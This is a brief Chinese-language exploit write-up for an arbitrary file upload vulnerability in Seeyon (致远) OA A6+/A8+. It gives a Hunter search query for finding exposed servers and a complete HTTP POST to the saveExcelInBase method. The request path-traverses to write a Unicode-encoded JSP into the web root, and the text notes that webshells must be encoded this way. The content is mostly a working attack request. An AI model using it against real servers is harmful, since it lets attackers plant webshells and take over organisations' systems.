致远OA saveExcelInBase存在任意文件上传漏洞
一、漏洞简介
致远OA saveExcelInBase存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。
二、影响版本
- 致远OA A6+
- 致远OA A8+
三、资产测绘
- hunter
app.name="致远 OA"
- 特征
四、漏洞复现
webshell需unicode编码
POST /seeyon/ajax.do;JSESSIONID=chat?method=ajaxAction&managerName=fileToExcelManager&rnd=12700 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Host: {hostname}
Accept: text/html, image/gif, image/jpeg, ; q=.2, */; q=.2
Content-Length: 94
Connection: close
managerMethod=saveExcelInBase&arguments=["../webapps/ROOT/stc.jsp","",{"columnName":["\u003C\u0025\u0020\u006F\u0075\u0074\u002E\u0070\u0072\u0069\u006E\u0074\u006C\u006E\u0028\u0022\u0031\u0032\u0033\u0022\u0029\u003B\u0020\u0025\u003E"]}]
上传文件位置
/stc.jsp
nuclei脚本